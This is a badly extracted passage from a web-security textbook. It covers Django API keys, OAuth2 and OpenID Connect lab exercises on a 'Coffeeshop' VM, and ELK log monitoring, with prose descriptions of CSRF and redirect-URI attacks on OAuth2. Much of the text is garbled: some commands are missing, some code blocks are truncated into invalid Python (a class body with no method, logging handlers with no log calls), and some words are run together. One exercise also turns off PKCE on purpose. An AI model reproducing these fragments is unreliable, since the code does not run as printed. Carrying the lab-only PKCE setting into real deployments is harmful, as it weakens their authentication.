Finally, restart Apache to pick up the code and database schema changes:
sudo apachectl restart
http://10.50.0.2/admin/
and log in as admin. You will notice a new section to manipulate the APIKey
model. Click on the + Add link, as shown in Figure 10-18, to add a new
API key. Enter a name for the key. Anything will do, but we have entered
myclient. After clicking the Save button, the page will print a confirmation,
346
Chapter 10 Authentication and Authorization
as shown in Figure 10-19, with the value of the new key. Save the key to a text
file somewhere as Django does not store it as cleartext. If you lose it, you will
have to delete it and create another.
Return to a Bash shell in the Vagrant VM (or on your host device if Curl is
installed) and enter the command
curl http://10.50.0.2/api/products/
The JSON response should tell you that you have not provided credentials.
Now enter
Note that this package uses Api-Key scheme instead of the more
conventional Bearer. This can, however, be changed in configuration.
347
Chapter 10 Authentication and Authorization
Figure 10-18. The Django Admin Console after adding the API Keys
module. The Add Key button is highlighted
348
Chapter 10 Authentication and Authorization
10.9 Summary
In this chapter, we looked at different methods for authentication
and authorization. The most common method of authentication is
username and password, either requested by the web server using
HTTP Basic authentication or by the application with form-based
authentication. However, other methods such as one-time passwords and
biometric authentication are gaining wider use, especially in two-factor
authentication models.
Authorization is the process of determining what permissions a user
has. Role-based authorization is popular, but Java Web Tokens (JWTs) and
API keys are also widely used.
OAuth2 is a protocol for standardizing authorization, especially
between applications where there is differing trust. It also supports
authentication in one use case. We will look at these in the next chapter.
349
CHAPTER 11
OAuth2
In the last chapter, we looked at authentication and authorization. A
widely used authorization protocol is OAuth2. It is a large topic with many
use cases and options, so we have given it its own chapter.
OAuth2 is defined in RFC 6749 [10]. It delegates the roles of a client
and authorization provider. In this way, authentication can be performed
exclusively by the service where the user is registered, without having to
share the user’s credentials.
As an example, imagine we want users of our Coffeeshop to be able to
automatically send a Facebook post when they buy our coffee. Facebook
provides an API for sending posts, but we need access to the user’s
Facebook account. We could ask the user to enter their username and
password and store these in our database. However, many users would
consider this a security risk, and justifiably so. Users do not want to give
applications access to their accounts on other services, especially ones
that contain private data. Facebook also does not want its customers’
credentials stored by potentially untrustworthy third-party applications.
OAuth2 provides a solution. Facebook defines roles that have limited
access to the user’s account, for example, being able to create posts but
not read them or read the address book. Our Coffeeshop asks Facebook
for permission to access the user’s account, with just that permission.
Facebook, not Coffeeshop, asks the user for their credentials.
OAuth2 has further use cases. For example, some services require
access to an API but not necessarily an individual user’s account. OAuth2
also provides authentication for one limited use case.
In this chapter, we will look at various ways OAuth2 can be used. We
will look at how the protocol works in each case, and we will do some
hands-on exercises using the Coffeeshop VMs.
We will also look at OpenID Connect (OIDC), a protocol for federated
authentication built on top of OAuth2.
Before continuing, we should briefly mention OAuth1. It was
developed with similar goals. However, OAuth2 is a rewrite rather than an
evolution of OAuth1, which, in hindsight, was considered difficult to use as
well as limiting. It has fallen out of use, and the terms OAuth and OAuth2
are used synonymously.
11.1 OAuth2 Terminology
OAuth2 defines four roles. These are the participants of the protocol
exchange, not the set of permissions the user or application has (which
OAuth2 refers to as scope). The roles are as follows:
352
Chapter 11 OAuth2
353
Chapter 11 OAuth2
Each flow makes use of certain data types sent between the client and
authorization server. The flows follow a common pattern, and the same
types of data occur in more than one flow. They are as follows:
354
Chapter 11 OAuth2
355
Chapter 11 OAuth2
The flow begins when the client wants permission to access resources
on behalf of the resource owner. In our example, this is to send a post on
behalf of the user. The resource owner initiates a GET request to the client
by clicking on a link on the client’s page. The client sends a redirect to the
/authorize endpoint on the authorization server, making a GET request
with the following as query parameters:
• Client ID
• Redirect URI
356
Chapter 11 OAuth2
• Scope
• State
Note that the request originates from the resource owner clicking a link
in their browser, not from the client back end. This is important because the
client needs later to be asked to grant permission via a page in the browser.
The client must be preregistered with the authorization server. The
latter will have issued the former with a client ID and a client secret. When
registering the client, one or more redirect URIs must also be provided.
The redirect URI in the authorization request must be from this list.
The state is a random string. It is not used by the authorization
server but is returned by it to the client so that the client can confirm it
corresponds to the same request that it made (we will see why later).
In Chapter 7, we learned that confidential data should not be passed
in GET requests. Note that none of the aforementioned is confidential. The
client secret is not passed in this step.
When the authorization server receives this request, one of two things
will happen. If a user is logged in (i.e., if a session ID was sent in a cookie),
that user will be identified, and the authorization server will proceed to
the next step. If not, it first prompts the user to sign in. Once the user has
signed in, the authorization server will ask the user if they are willing for
the client access to requested scope. In the figure, the application is called
AppName. This is the name that was registered to receive the client ID.
Notice that the user’s ID was not sent. The client does not have to know
the ID of the user on the authorization server. It only has a client ID, which
is associated with the application, not the user.
If the user grants access, the authorization server redirects the user to
the redirect URI that was provided in the preceding GET request. This has
to have been registered with the authorization server to prevent attacks.
We will see an example soon.
357
Chapter 11 OAuth2
• Client ID
• Client secret
• Redirect URI
If the data are all valid, the authorization server responds with a
JSON string:
{
"access_token": "<ACCESS_TOKEN>",
"refresh_token": "<REFRESH_TOKEN>",
"token_type": "Bearer",
"expires_in": "<SECONDS>"
}
The client can now use the access token to request resources on the
resource server, passing the access token in the Authorization: Bearer
header. The access and refresh tokens should be kept confidential as they
grant users access to resources on the server.
How the resource server validates the access token is not defined
by the OAuth2 standard. One common way is for the resource server
and the authorization server to share a database in which the access
358
Chapter 11 OAuth2
token is stored. Another option is for the access token to be a JWT, which
the resource server can validate by having the authorization server’s
public key.
359
Chapter 11 OAuth2
and initiates the flow to obtain an authorization code (step 1). This is to
ensure he gets a state parameter generated by the client. He intercepts the
GET request and replaces the legitimate request URI with one to his own
malicious server. He sends this link to the victim, Alice, and tricks her into
clicking on it (step 2).
Alice follows the link (step 3) and is taken to the authorization server,
where she grants permission (step 4). As her link has an altered request
URI, she is redirected to Bob’s malicious site (step 5). Bob captures the
authorization code created for Alice’s account (step 6). He creates a GET
request to the client at step 7 (what would have been step 2 in Figure 11-1) with
360
Chapter 11 OAuth2
The client now completes the authorization flow by sending the POST
request to the authorization server (step 8), which sends the access token
back to the client (step 9). Bob’s account at the client is now authorized to
access Alice’s account on the authorization server.
Figure 11-3. The CSRF attack on the OAuth2 authorization code flow
361
Chapter 11 OAuth2
The authorization server sends the redirect response to the request URI in
step 3. Rather than letting his browser follow the redirect, Bob intercepts
it and copies the URI, including the authorization code that was issued to
him (step 4).
Bob sends the URI with his authorization code to the victim, Alice, and
tricks her into clicking on it (step 5). The authorization server has already
authenticated Bob, and he has already granted the client access to his
account. Therefore, Alice will not see a dialog asking her for authorization.
When she clicks on it, she is taken to the client’s redirect URI (step 6),
which makes a POST request to the authorization server (step 7). The
authorization code is valid, so the authorization server creates an access
token and returns it to the client in step 8. However, this is to access Bob’s
account. Bob has connected Alice’s client account to Bob’s account on the
authorization server.
Other Attacks
Other potential attacks include clickjacking, which is prevented by the
X-Frame-Options header, as we saw in Section 8.3, and code injection. We
looked at this in Section 7.3. The defenses are the same.
For other possible attacks, see Chapter 10 of the RFC [10].
362
Chapter 11 OAuth2
The Django OAuth Toolkit package, which would ordinarily be installed with
• Client: CSThirdparty
Rather than implementing all the calls in the client, we will perform most of
them by hand, with either the browser or Curl. This will make it easier to follow
how the flow works.
INSTALLED_APPS = (
...
'oauth2_provider',
)
Also add the following configuration at the end of the setting.py file:
# OAuth Settings
OAUTH2_PROVIDER = {
"PKCE_REQUIRED": False
}
363
Chapter 11 OAuth2
This turns off PKCE, which is on by default (we will look at PKCE later).
This app provides a number of URLs, which we include with the following
change in coffeeshopsite/coffeeshop/urls.py:
urlpatterns = (
...
path('oauth/', include('oauth2_provider.urls',
namespace='oauth2_provider')),
)
The URLs we added previously are for the authorization server. In order to
try out OAuth2, we need at least one API call on the resource server that is
available only with an OAuth2 access token. The Django OAuth Toolkit provides
support. We will add a simple API call to
coffeeshopsite/coffeeshop/views.py
364
Chapter 11 OAuth2
urlpatterns = (
...
path('oauth/', include('oauth2_provider.urls',
namespace='oauth2_provider')),
path('oauthapi/hello', views.OAuthResource.as_view()),
)
sudo apachectl restart
You can confirm you do not have permission to access the preceding endpoint
with the following command:
curl -I http://10.50.0.2/oauthapi/hello
http://10.50.0.2/admin/
http://10.50.0.2/oauth/applications/register/
366
Chapter 11 OAuth2
Before clicking the Save button, note down the client ID and client secret.
Django only stores the client secret in hashed form, so if you don’t save it on
this screen, you will be unable to retrieve it. Note that after you click Save,
Django will display a client secret on the screen. This, however, is the hashed
secret; you need to save the unhashed secret which is only displayed before
you click Save.
After you have noted the client ID and secret, click the Save button.
http://10.50.0.2/
We are going to play the part of the CSThirdparty app requesting access to
Bob’s account by entering commands manually, entering them into the web
browser and with Curl. Enter the following URL into a browser:
http://10.50.0.2/oauth/authorize/?
response_type=code&client_id=YOUR_CLIENT_ID
&redirect_uri=http://10.50.0.3/oauthcallback
snippets/oauth2/auth_code/commands.txt
After entering the URL, you will see the Coffeeshop login page, unless a user is
logged in already. Log in as Bob. You will be asked to confirm access to Bob’s
Coffeeshop account with the dialog shown in Figure 11-5. We didn’t include
scope in our URL, so it defaulted to Django OAuth Toolkit’s defaults, which are
Read and Write. These are visible in the dialog.
367
Chapter 11 OAuth2
def oauthcallback(request):
context = {}
return JsonResponse({'code': request.GET['code']})
If you look at Figure 11-1 again, you will see that the GET parameters to the
request URI contain code. The value of this is the authorization code. We
are just returning it in a JSON string so we can capture it. Copy this code
into a file.
If you get an error saying that a code challenge is expected, check that you
selected a client type of Confidential when you registered the application. Also
check that you remembered to include the lines
# OAuth Settings
OAUTH2_PROVIDER = {
"PKCE_REQUIRED": False
}
in settings.py.
368
Chapter 11 OAuth2
The next step in the flow is to exchange the authorization code for an access
token. We can’t do this in the browser’s address bar because it is a POST
request. Instead, we will use Curl. The command is in the commands.txt file:
curl -X POST \
-H "Cache-Control: no-cache" \
-H "Content-Type: application/x-www-form-urlencoded" \
"http://10.50.0.2/oauth/token/" \
-d "client_id=YOUR_CLIENT_ID" \
-d "client_secret=YOUR_CLIENT_SECRET" \
-d "code=YOUR_AUTHORIZATION_CODE" \
-d "redirect_uri=http://10.50.0.3/oauthcallback" \
-d "grant_type=authorization_code"
Enter this command into the terminal, substituting your client ID and
client secret for YOUR_CLIENT_ID and YOUR_CLIENT_SECRET. Substitute
the authorization code you copied from the browser for YOUR_
AUTHORIZATION_CODE.
{"error": "invalid_grant"}
This is because the authorization code has a very short expiry. It expired in the
time it took you to enter the command. The best way to make this work is to
enter the preceding Curl command into a shell script, say, post.sh, pasting in
your client ID and your client secret. Visit the URL
http://10.50.0.2/oauth/authorize/?
response_type=code&client_id=YOUR_CLIENT_ID
&redirect_uri=http://10.50.0.3/oauthcallback
again (remember to paste in your client ID). As quickly as you can, copy the
new authorization code and paste it into your shell script. Now execute it:
bash post.sh
369
Chapter 11 OAuth2
If you were successful, you will receive a JSON string similar to the following:
{"access_token": "i6TY0MrlxE8sgNCZuS5dMFCf0vtFqu",
"expires_in": 36000, "token_type": "Bearer",
"scope": "read write", "refresh_token":
"wZ0Ot1OW8V5buAIq0sUlV2MaViADHY"}
Don’t remove the edits we did for this exercise. We will build on them in the
next one.
11.3 Implicit Flow
For the authorization code flow to be secure, the client secret needs
to be secret. The flow is designed for server-rendered pages. In these
applications, the client secret is not sent to the browser, thus avoiding
disclosure.
However, disclosing the client secret cannot be avoided in client-
rendered JavaScript applications. The implicit flow was designed for this
purpose. We describe it briefly here; however, it has been deprecated in
favor of the more secure authorization code with PKCE flow. The implicit
flow is illustrated in Figure 11-6.
370
Chapter 11 OAuth2
The resource owner initiates the flow in the same way as for the
authorization code flow. Again, the client’s redirect is to the /authorize
endpoint on the authorization server but this time with a grant type of
token. Rather than issuing an authorization code, the authorization server
responds with a redirect containing the access token. However, it is given
in the page fragment (after a #) instead of as a query parameter (after a ?).
The rationale was to allow the browser to read the access token while
preventing the browser from sending it back in a request. Older browsers
could manipulate the page fragment to extract the access token. However,
they could not manipulate the full path without triggering a page reload.
Old browsers also had a limitation of only being able to send JavaScript
requests to the same origin. The POST request in the authorization flow
371
Chapter 11 OAuth2
needs to be sent from the client page to the authorization server. Neither of
these limitations now hold, the former because of the History API and the
latter because of CORS.
The implicit flow is now considered insecure because the access token
is sent in the GET request. This is addressed by the authorization code with
PKCE flow.
372
Chapter 11 OAuth2
373
Chapter 11 OAuth2
authorization code flow, the state prevents the client from exchanging
an authorization code created by a different client instance for an access
token. Preregistering the request URI prevents the same authorization
code Redirect URI Manipulation attack described in the previous section.
The rest of the flow is the same as the standard authorization code
flow. If the rehashed code verifier matches the code challenge, the
authorization server responds with an access token that can then be used
to access resources on the resource server.
11.5 Password Flow
The password flow is the only flow that performs authentication as well
as authorization. The client asks for a username and password on behalf
of the authorization server. It should therefore only be used in situations
where there is strong trust between the two, for example, where they are
part of the same application.
The flow is illustrated in Figure 11-8. When it is initiated, a form is
presented to the resource owner prompting for a username and password.
These are sent to the authorization server’s /token endpoint, along with
the client ID. An additional client secret is optional and, of course, should
only be used where the POST call is made from the back end, not a front-
end JavaScript application. The grant type is password.
374
Chapter 11 OAuth2
375
Chapter 11 OAuth2
376
Chapter 11 OAuth2
11.7 Device Flow
The device flow is intended for authorizing clients that have limited input
capabilities, such as a Smart TV, to use the resource owner’s account. The
request for permission is displayed on a separate device that does have
input capabilities.
If you have used YouTube on an Apple TV, you will have seen this flow.
The client (Apple TV in this case) displays a URL and a code. The resource
owner visits that URL on a different device, for example, a smartphone,
and enters the code to grant access.
The full flow is illustrated in Figure 11-10. We have shown the device
as a Smart TV and the additional device as a smartphone. The flow starts
when the client makes a POST request to the /token endpoint on the
authorization server, passing the client ID and requesting a response type
of device_code. The device code identifies that particular device and is
issued by the authorization server. It is returned to the client in a JSON
string, along with a user code, verification URI, interval, and expiry time.
377
Chapter 11 OAuth2
The client displays the verification URI so that the resource owner
can visit it on the additional device. It also displays the user code. The
resource owner visits the verification URI on their separate device. A page
is displayed prompting them for the user code. When they enter it, a POST
378
Chapter 11 OAuth2
{"error": "authorization_pending"}
379
Chapter 11 OAuth2
If the refresh token is valid for the client ID and has not expired, the
authorization server responds with a JSON string containing the new
access token and, optionally, a new refresh token.
11.9 OpenID Connect
OpenID Connect (OIDC) is for federated login. Instead of implementing
user management on your site, you can delegate it to another site where
the user has an account. This is the pattern used by sites that allow their
users to log in with a Google or Facebook account. The benefits include
380
Chapter 11 OAuth2
381
Chapter 11 OAuth2
The ID token is a JWT. We saw these in the last chapter, in Section 10.7.
As a minimum, it contains the sub claim containing username, the scope
claim with the scopes the user is authorized with, and most likely an
expiry claim. The authorization server may add other information such as
the user’s real name. An example is
{
"sub": "bob",
"name": "Bob Smith",
"scope": ["read", "write"]
}
OIDC in Django
There are a number of packages that add OIDC support to Django. The
Django OAuth Toolkit we used in Section 11.2 provides the functionality
we need to write the provider but not the client. In the following exercise,
we will use it to build an OIDC provider into our Coffeeshop application.
We will test it by manually entering URLs, as we did in the previous
exercise. Later, we will use a different package to turn CSThirdparty into an
OIDC client.
382
Chapter 11 OAuth2
We will use the Django OAuth Toolkit to make Coffeeshop an OIDC provider.
This will enable users at third-party sites to authenticate using their
Coffeeshop account. In this exercise, we will test the functionality manually
by entering URLs. In the next exercise, we will turn CSThirdparty into a proper
OIDC client.
We have the option of signing the ID token with an HMAC symmetric key or an
RSA private key. Let’s use RSA. In the Coffeeshop VM, create a key with
INSTALLED_APPS = (
...
'oauth2_provider',
)
# OAuth Settings
with open("/secrets/oidc.key", "r") as f:
OIDC_RSA_PRIVATE_KEY = f.read()
OAUTH2_PROVIDER = {
"PKCE_REQUIRED": False,
383
Chapter 11 OAuth2
"OAUTH2_VALIDATOR_CLASS":
"coffeeshop.oauth_validator.CoffeeShopOAuth2Validator",
"OIDC_ENABLED": True, # set to True when providing
OIDC login
"OIDC_RSA_PRIVATE_KEY": OIDC_RSA_PRIVATE_KEY,
"SCOPES": {
"read": "Read scope",
"write": "Write scope",
"openid": "OpenID Connect scope",
}
}
The first two lines read our new RSA private key and place it in the
OIDC_RSA_PRIVATE_KEY variable.
The authorization server and client have to share the notion of a user identifier.
In the Django OAuth Toolkit, this is the id from the user table by default. This
is numeric and quite meaningless to the user, as it is internal to Django. We
can configure Django OAuth Toolkit to use the username instead. We do this by
creating a custom validator class. The name of this class is set in the OAUTH2_
VALIDATOR_CLASS variable.
384
Chapter 11 OAuth2
Since we are creating a new validator class anyway, let’s also provide the
user’s email address and real name to the client. Create a new file
coffeeshopsite/coffeeshop/oauth_validator.py
class CoffeeShopOAuth2Validator(OAuth2Validator):
return {
"sub": request.user.username,
"email": request.user.email,
"first_name": request.user.first_name,
"last_name": request.user.last_name,
}
If you didn’t in the last exercise, run the Django migrations with
sudo apachectl restart
The process to register the client is very similar to the previous exercise.
First, visit
http://10.50.0.2/admin
http://10.50.0.2/oauth/applications/
385
Chapter 11 OAuth2
and delete the CSThirdparty application we created in the last exercise. Click
on the link provided to create a new application, or visit
http://10.50.0.2/oauth/applications/register/
Fill in the form as in Figure 11-13. Note down the new Client ID and Client
Secret, and then click Save. Now log out.
386
Chapter 11 OAuth2
token. In the last exercise, we created a shell script called post.sh. We will
use the same script here. Ensure it still has the following, but substitute in your
new client ID and client secret:
curl -X POST \
-H "Cache-Control: no-cache" \
-H "Content-Type: application/x-www-form-urlencoded" \
"http://10.50.0.2/oauth/token/" \
-d "client_id=YOUR_CLIENT_ID" \
-d "client_secret=YOUR_CLIENT_SECRET" \
-d "code=YOUR_AUTHORIZATION_CODE" \
-d "redirect_uri=http://10.50.0.3/oauthcallback" \
-d "grant_type=authorization_code"
http://10.50.0.2/oauth/authorize/?
response_type=code&client_id=YOUR_CLIENT_ID
&scope=openid&&redirect_uri=http://10.50.0.3/oauthcallback
again substituting in your client ID. You will be prompted to log in and then to
authorize CSThirdparty. When your browser is redirected to the Response URI,
copy the authorization code, paste it into your shell script, and then execute it.
• An access token
• A refresh token
• An ID token
• An expiry time
• A scope of openid
387
Chapter 11 OAuth2
The access token and refresh token work as before. The ID token is longer
because it has been signed.
The ID token is a regular JWT. We can decode the header and payload by
Base64-decoding it. Let’s do this on the command line with Bash commands.
Copy the ID token from the JSON string and paste it into a file, say, jwt.txt.
Now enter the following commands to split it into the header, payload, and
signature files:
Recall from the last chapter that the header, payload, and signature are
Base64Url-encoded. The Unix base64 command doesn’t decode these without
some preprocessing. We have a script in the Coffeeshop VM to automate this.
Decode the header with the command
catfirstline.txt|/vagrant/scripts/base64url_dec.sh
The kid value is an identifier indicating which key was used. We will see this
again later.
388
Chapter 11 OAuth2
cp firstline.txt headerpayload.txt
echo -n '.' >> headerpayload.txt
cat secondline.txt >> headerpayload.txt
We need the public key to verify the signature. The private key is in
/secrets/oidc.key. We saw how to extract the public key from a private
key in Chapter 4. Enter the following command:
Verified OK
The jwt.io website has a convenient tool for performing the same process.
Visit this site in your browser. You will see a page similar to Figure 11-14.
Paste your ID token under Encoded, and you should see the decoded header
and payload in the Decoded section.
389
Chapter 11 OAuth2
The advantage of using RSA is that the signature can be verified without
having to distribute the secret key to each client. The OAuth2 definition
includes a standardized URL for requesting the public key. In your browser, or
using Curl, visit
http://10.50.0.2/oauth/.well-known/jwks.json
You should see a JSON response listing the OIDC keys on the authorization
server, indexed by the kid.
390
Chapter 11 OAuth2
In this exercise, we will turn CSThirdparty into an OIDC client. Rather than
having users register at CSThirdparty to create an account, they will log in
using their existing Coffeeshop credentials.
To do this exercise, you will first need to complete the previous one: Build an
OIDC Provider in Django.
INSTALLED_APPS = [
...
'csthirdparty',
'oidc_rp',
]
391
Chapter 11 OAuth2
MIDDLEWARE = [
...
'oidc_rp.middleware.OIDCRefreshIDTokenMiddleware',
]
# AUTH CONFIGURATION
# --------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/
settings/#login-url LOGIN_URL = reverse_lazy('oidc_auth_
request')
# See: https://docs.djangoproject.com/en/dev/ref/
settings/#authentication-backends AUTHENTICATION_BACKENDS = [
'oidc_rp.backends.OIDCAuthBackend',
'django.contrib.auth.backends.ModelBackend',
]
The OIDC_RP_PROVIDER_ENDPOINT is the base URL that the client will use
to access the authorization server (the /authorize and /token endpoints).
The OIDC_RP_SCOPES variable is the list of scopes that will be requested
392
Chapter 11 OAuth2
urlpatterns = [
...
path('oidc/', include('oidc_rp.urls')),
] + static(settings.MEDIA_URL, document_root=settings.
MEDIA_ROOT)
Finally, let’s make the index page only accessible to logged-in users by adding
the @login_required decorator to the view in csthirdpartysite/
csthirdparty/views.py:
@login_required
def index(request):
...
sudo apachectl restart
Before we can use the Coffeeshop OIDC Provider, we need to make a couple of
changes to it. Firstly, we need to register the Django OIDC RP’s default request
URI to the registered list. In your browser, visit
http://10.50.0.2/
http://10.50.0.2/oauth/applications
393
Chapter 11 OAuth2
Log in as admin and click on CSThirdparty. Click the Edit button and
add the URI
http://10.50.0.3/oidc/auth/cb/
to the request URIs (see Figure 11-15). Don’t forget the trailing slash. Click the
Save button. Now log out by visiting
http://10.50.0.2/
Figure 11-15. Adding the Django OIDC RP’s default request URI
394
Chapter 11 OAuth2
coffeeshopsite/coffeeshop/urls.py
urlpatterns = [
...
path('oauth/token', oauth2_provider.views.TokenView.as_
view()),
]
path('oauth/', include('oauth2_provider.urls',
namespace='oauth2_provider')),
in this file. This already adds the same mapping, but as oauth/token/ with
the trailing slash.
sudo apachectl restart
You should be redirected to the Coffeeshop login page. Enter Bob’s or Alice’s
username and password. Click Sign In and you should see the dialog in
Figure 11-16 requesting permission to use the credentials through OpenID
Connect. Click on Authorize and you will be logged in and taken to
CSThirdparty’s index page.
395
Chapter 11 OAuth2
The client is performing all the activities we did manually in the previous
exercise:
11.10 Summary
OAuth2 allows applications to access a limited set of resources on another
server using their credentials on that server. It prevents third-party
applications from having to request credentials such as a username and
password from the user.
Unlike API keys, OAuth2 doesn’t need to persistently store any keys
or tokens belonging to the user. It also gives the user a more automatic,
integrated experience.
OAuth2 has different flows for clients which can keep secrets
confidential and clients which can’t. The latter includes JavaScript
applications where data is stored in the browser. When a user’s account is
396
Chapter 11 OAuth2
needed and the client can keep the secret confidential, the authorization
code flow is recommended. Where the secret cannot be kept confidential,
the authorization code with PKCE flow should be used. When client-server
authorization is needed that doesn’t depend on user credentials, OAuth2
provides the client credentials flow.
OpenID Connect, or OIDC, is a federated login procedure based
on OAuth2. This enabled developers to build applications that delegate
authentication to another server. When this happens, the secondary site
does not need to store user credentials.
In the next chapter, we turn to running the application and what
developers can do to make operation more secure.
397
CHAPTER 12
Logging
and Monitoring
This is arguably the most important chapter in the book. Try as we may
to prevent attackers compromising our systems, there will always be a
chance that one will succeed. Damage, actual and reputational, can be
minimized by taking action early. Damage can even be prevented by acting
as soon as unauthorized access is attempted, before an attacker succeeds
in gaining entry.
In order to respond rapidly to unauthorized access, you must generate
logs, and you or an operations team must monitor them. This may also be
required by compliance departments. If you have several applications and
servers, manually looking through log files becomes unsustainable.
In this chapter, we will look at how to automatically consolidate log
files, from one or several servers, so they can be viewed and searched in
one place. We will set up the Elastic Stack, or ELK, which is a popular open
source toolset for logging and monitoring.
We will also look at how to create custom logging for our application,
beyond what is provided by Apache by default, and create alerts so that we
don’t miss important security events.
• Timestamp
• Client IP address
• URL
• Response code
Reading a single, aggregated log is better than reading several logs and
several hosts because you only have to look in once place. However, it is
difficult to read and analyze because it is large and entries appear in the
order sent, not necessarily in an order that shows a sequence of related
events. It is difficult to find important entries and to follow an attack vector.
Analytic engines help with this task by providing a query language and
dashboards. They can also generate alerts, sending emails or notifications
to tools such as Slack.
One popular toolset is Elastic Stack, also called ELK. Later in this
chapter, we will use this stack in an exercise to implement logging and
monitoring for Coffeeshop.
400
Chapter 12 Logging and Monitoring
logstash-yyyy.mm.dd-n
coffeeshop/vagrant/elk/apache.conf
401
Chapter 12 Logging and Monitoring
input {
file {
path => "/var/log/apache2/*.log"
start_position => "beginning"
}
}
filter {
if [path] =~ "access" {
mutate { replace => { type => "apache_access" } }
grok {
match => { "message" => "%{COMBINEDAPACHELOG}" }
}
date {
match => [ "timestamp" , "dd/MMM/yyyy:HH:mm:ss Z" ]
}
} else if [path] =~ "error" {
mutate { replace => { type => "apache_error" } }
} else {
mutate { replace => { type => "random_logs" } }
}
}
output {
elasticsearch {
hosts => ["localhost:9200"]
}
stdout { codec => rubydebug }
}
402
Chapter 12 Logging and Monitoring
The first section, input { ... }, defines the file sources. We are
loading all files from the /var/log/apache2 directory, starting at the
beginning of each file. Logstash understands file rotation. When a log file
reaches a certain size, Apache appends a number to it and creates a new
log file. Once log files reach a certain age, they are compressed. Logstash
understands this and ensures log entries are not duplicated when it
parses them.
The second section, filter { ... }, tells Logstash how to parse the
files. Apache’s error and access logs have different formats, so we parse
them differently, using an if statement to check the file name:
if [path] =~ "access" {
...
} else if [path] =~ "error" {
...
} else {
...
}
Logstash assigns a type to each log file. It puts this in the type field. The
default is _doc.
Logstash creates the following additional fields:
These fields are sufficient for our Apache error log files, so we don’t
do any further processing, other than to replace the value of type with
apache_error in the line:
403
Chapter 12 Logging and Monitoring
grok {
match => { "message" => "%{COMBINEDAPACHELOG}" }
}
date {
match => [ "timestamp" , "dd/MMM/yyyy:HH:mm:ss Z" ]
}
This replaces the default parsing for the timestamp field. Apache error
log timestamps are formatted according to the Logstash default. Apache
access log timestamps are not, so we need to declare the correct syntax.
The last section in the file, output { ... }, defines where to send the
parsed log entries. We are sending them to two locations: elasticsearch
and stdout. For elasticsearch, we define the host and port Elasticsearch
is running on. For stdout, we use the rubydebug plug-in to format it. This
is the default value. Another possibility is json.
1
https://github.com/logstash-plugins/logstash-patterns-core
404
Chapter 12 Logging and Monitoring
Installing ELK
cd /vagrant/elk
sudo bash install-elk.sh
1. Add Elastic to the Apt sources list so that we can fetch the
latest versions with apt-get.
405
Chapter 12 Logging and Monitoring
You should now see a screen like Figure 12-2 (if you have a wizard popover,
close it first). The log entries you see in the section on the right will differ.
Click + Add Filter (highlighted in the figure). In the popup, select type from the
Field drop-down (not _type with the leading underscore character), select is
from the Operator drop-down, and enter apache_access under Value. This is
shown in Figure 12-3. Click Save.
Let’s create a more complex query to view accesses on the admin console
login page. This time we need to use Elasticsearch’s query language,
DSL. Leave the type: apache_access filter we previously created as it is. Click
+ Add Filter again.
406
Chapter 12 Logging and Monitoring
Now click Edit as Query DSL at the top right of the filter popup. Enter the text
as shown in Figure 12-4. You will find this text in the file
coffeeshop/vagrant/elk/dsl/admin-login.dsl
Click Save. This is a simple wildcard search on the request field, which
contains the URL from the HTTP request.
coffeeshop/secrets/config.env
Go back to Kibana and click Refresh. You should see your login attempt.
As we parsed the access log file when creating the apache.conf file, we
can make the output easier to read by customizing the fields. At the left of
the Kibana screen, hover over clientip and click the + button. Do the same
for verb, request, and response. Your screen should look something like
Figure 12-5. If you like, you can save the query for reuse later.
407
Chapter 12 Logging and Monitoring
408
Chapter 12 Logging and Monitoring
409
Chapter 12 Logging and Monitoring
If you followed the preceding exercise, the ELK stack will now be
running in your virtual machine and enabled each time you start the VM
with vagrant up. It can consume a lot of CPU. If you find this, you can
disable it with
DEBUG = True
/var/log/apache2/error.log
We could create our own custom login and logout messages and also
send them to the console, but in order for ELK to parse them into fields, we
need to have a common format for each line in this file. A better solution is
to create a separate file to log them to. We can do this in Django by setting
the LOGGING variable in settings.py.
410
Chapter 12 Logging and Monitoring
This exercise builds on the previous one, so make sure you have completed it
first. We will observe successful logins, successful logouts, and failed logins in
Kibana. There are four steps:
411
Chapter 12 Logging and Monitoring
This exercise relies on the previous one, in which we installed the ELK stack.
If you did not do that exercise, please complete it first. If you did do it, and you
restarted your VM since then, you will need to restart the ELK stack manually
by running the following inside your Coffeeshop VM:
cd /vagrant/elk
sudo bash ./enable.sh
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'timestamp': {
'format': '{asctime} {message}',
'style': '{',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
},
'login': {
'level': 'INFO',
'class': 'logging.FileHandler',
'filename': '/var/log/django/login.log',
412
Chapter 12 Logging and Monitoring
'formatter': 'timestamp'
},
},
'root': {
'handlers': ['console'],
'level': 'WARNING',
},
'loggers': {
'django': {
'handlers': ['console'],
'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),
'propagate': False,
},
'login': {
'handlers': ['login'],
'level': 'INFO',
'propagate': False,
},
},
}
This configures Django to write to a new log file. We will have to create the
directory. Enter the following inside your Coffeeshop VM:
413
Chapter 12 Logging and Monitoring
vagrant/coffeeshopsite/coffeeshop/signals.py
import logging
from django.contrib.auth.signals import user_logged_in, user_
logged_out, user_login_failed
from django.dispatch import receiver
log = logging.getLogger('login')
@receiver(user_logged_in)
def user_logged_in_callback(sender, request, user, **kwargs):
ip = request.META.get('REMOTE_ADDR')
uri = request.META.get('PATH_INFO')
if (request.META.get('QUERY_STRING')):
uri += '?' + request.META.get('QUERY_STRING')
@receiver(user_logged_out)
def user_logged_out_callback(sender, request, user, **kwargs):
ip = request.META.get('REMOTE_ADDR')
uri = request.META.get('PATH_INFO')
if (request.META.get('QUERY_STRING')):
uri += '?' + request.META.get('QUERY_STRING')
414
Chapter 12 Logging and Monitoring
uri=uri
))
@receiver(user_login_failed)
def user_login_failed_callback(sender, credentials, request,
**kwargs):
user = credentials['username']
ip = request.META.get('REMOTE_ADDR')
uri = request.META.get('PATH_INFO')
if (request.META.get('QUERY_STRING')):
uri += '?' + request.META.get('QUERY_STRING')
